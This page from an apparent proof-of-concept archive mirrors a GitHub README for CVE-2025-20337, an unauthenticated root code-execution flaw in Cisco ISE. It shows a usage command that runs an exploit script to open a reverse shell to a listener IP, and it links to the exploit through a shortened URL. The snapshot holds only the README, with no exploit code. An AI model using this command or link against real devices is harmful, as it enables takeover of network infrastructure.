Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2025-20337 PoC — Cisco ISE API Unauthenticated Remote Code Execution Vulnerability

Source
https://github.com/barbaraeivyu/CVE-2025-20337-EXP
Associated Vulnerability
Title:Cisco ISE API Unauthenticated Remote Code Execution Vulnerability (CVE-2025-20337)
Description:A vulnerability in a specific API of Cisco ISE and Cisco ISE-PIC could allow an unauthenticated, remote attacker to execute arbitrary code on the underlying operating system as root. The attacker does not require any valid credentials to exploit this vulnerability. This vulnerability is due to insufficient validation of user-supplied input. An attacker could exploit this vulnerability by submitting a crafted API request. A successful exploit could allow the attacker to obtain root privileges on an affected device.
Readme
# CVE-2025-20337

## DISCLAIMER
> This tool is provided for **educational and authorized security testing purposes only**. The author is not responsible for any misuse of this tool. Unauthorized testing of systems without explicit permission is illegal and strictly prohibited. By using this tool, you agree to use it only on systems for which you have obtained prior written permission. Any actions and or activities related to the material contained within this repository are solely your responsibility.

## Description:

The attacker can compromise any unpatched Cisco ISE or ISE-PIC device by sending a malicious API request over the network.
No authentication or user interaction is required. By exploiting a deserialization flaw in the monitoring API, attackers gain root access to the underlying operating system. This vulnerability turns network security appliances into attack launchpads, enabling total infrastructure takeover.

### Usage

```bash
./exploit.sh -t 10.0.55.10 -l 192.168.1.100 -p 4444

# Options:
#   -t  Target IP address
#   -l  Listener IP for reverse shell
#   -p  Listener port
#   -c  Custom command (optional)
```

Exploit:
[**href**](https://tinyurl.com/2cj5v6ze)
File Snapshot

 [4.0K]  /data/pocs/47a8415f7af5f29f65515b74a566934a95c87bae
└── [1.2K]  README.md

0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →